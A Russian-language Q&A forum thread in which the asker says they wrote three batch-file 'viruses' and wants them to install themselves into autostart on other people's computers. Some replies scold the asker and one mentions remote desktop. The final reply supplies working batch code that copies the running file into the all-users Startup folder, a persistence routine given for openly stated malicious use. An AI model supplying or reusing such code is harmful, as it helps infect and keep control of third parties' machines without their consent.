Техотдел Вчдр-2

Как прописать файл в автозагрузку?

Не ЗАКИНУТЬ В ПАНЕЛЬ УПРАВЛЕНИЯ ..
а вирус bat файл сам прописался в автозагрузке. .
Я не програмист обьясню как смогу. .
Создал 3 вируса и создал запуск сразу трёх этих файлов.. как сделать так чтобы они запускались при включении компьютера.. .
Не у меня на компе а на чужих! Тоесть ты запускаеш сам bat и он автоманически прописывается в автозагрузку.
НУ КААК!?

М Куз

"Я не программист" и "создал 3 вируса" как то не стыкуются.
По сути вопроса займитесь чем нибудь другим пока не поймали, а таких чудиков ловят быстро и хорошо если органы

Галина Филиппова

в задницу себе свои вирусы внедри, а не людям жизнь отравляй

Марина

надо сначала удалённый стол настроит ь чужойпотом вписывай

Татьяна Стогний

Прописать это в начале своего файла:

@echo off
if exist "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\%~nx0" goto no_copy
copy "%~f0" "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\" > nul
:no_copy